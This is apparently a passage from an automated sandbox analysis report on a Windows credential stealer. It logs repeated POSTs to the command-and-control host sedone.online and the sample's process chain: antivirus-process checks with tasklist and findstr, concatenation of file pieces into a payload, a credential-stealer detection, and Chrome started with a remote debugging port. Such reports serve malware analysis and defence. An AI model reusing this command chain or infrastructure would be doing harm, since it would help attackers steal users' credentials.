name="token"f6e3068fca5959a39c6a927e77fa1ae2------RIWTJEUKXLN7QIMYUSJMContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------RIWTJEUKXLN7QIMYUSJMCont
2024-12-15 19:48:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:36 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49873	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:37 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 6249 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:37 UTC	6249	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------2DTJEUS2DTRQQIMOZMYMCont
2024-12-15 19:48:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49874	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:38 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----A1N7QIE37YCBAAA1VKN7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 4573 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:38 UTC	4573	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 49 45 33 37 59 43 42 41 41 41 31 56 4b 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 49 45 33 37 59 43 42 41 41 41 31 56 4b 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 49 45 33 37 59 43 42 41 41 41 31 56 4b 4e 37 0d 0a 43 6f 6e 74 Data Ascii: ------A1N7QIE37YCBAAA1VKN7Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------A1N7QIE37YCBAAA1VKN7Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------A1N7QIE37YCBAAA1VKN7Cont
2024-12-15 19:48:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49880	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:40 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GVA1VKFU3EKF3E37900Z User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1977 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:40 UTC	1977	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 Data Ascii: ------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------GVA1VKFU3EKF3E37900ZCont
2024-12-15 19:48:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49882	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:41 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GVA1VKFU3EKF3E37900Z User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 3161 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:41 UTC	3161	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 Data Ascii: ------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------GVA1VKFU3EKF3E37900ZCont
2024-12-15 19:48:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49888	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:43 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:43 UTC	1697	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 Data Ascii: ------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------26XB16PZUA1VAASJ5PHVCont
2024-12-15 19:48:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:44 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49893	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:44 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8QQ9HVKF37QIE3EUKXLF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1929 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:44 UTC	1929	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 Data Ascii: ------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8QQ9HVKF37QIE3EUKXLFCont
2024-12-15 19:48:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49899	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:47 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L6XBI5FCBIEUAIEK6PPP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:47 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 Data Ascii: ------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------L6XBI5FCBIEUAIEK6PPPCont
2024-12-15 19:48:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:47 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49905	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:50 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1NYU3OHDJMYU3ECBA1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:50 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------1NYU3OHDJMYU3ECBA1NYContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------1NYU3OHDJMYU3ECBA1NYContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------1NYU3OHDJMYU3ECBA1NYCont
2024-12-15 19:48:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49912	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:52 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4E37Q1NOHDJE37900ZMY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 Data Ascii: ------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------4E37Q1NOHDJE37900ZMYCont
2024-12-15 19:48:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:46:59
Start date:	15/12/2024
Path:	C:\Users\user\Desktop\lem.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lem.exe"
Imagebase:	0x400000
File size:	978'099 bytes
MD5 hash:	27B18A5E8BDAA950AF93633A821C2BFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:46:59
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:46:59
Start date:	15/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:47:00
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x310000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:47:00
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:47:02
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x310000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:47:02
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:47:03
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 628056
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:47:03
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Cleared" Penalties
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:47:03
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:47:03
Start date:	15/12/2024
Path:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Wow64 process (32bit):	true
Commandline:	Corrections.com u
Imagebase:	0x920000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:47:04
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x430000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:47:20
Start date:	15/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:47:40
Start date:	15/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

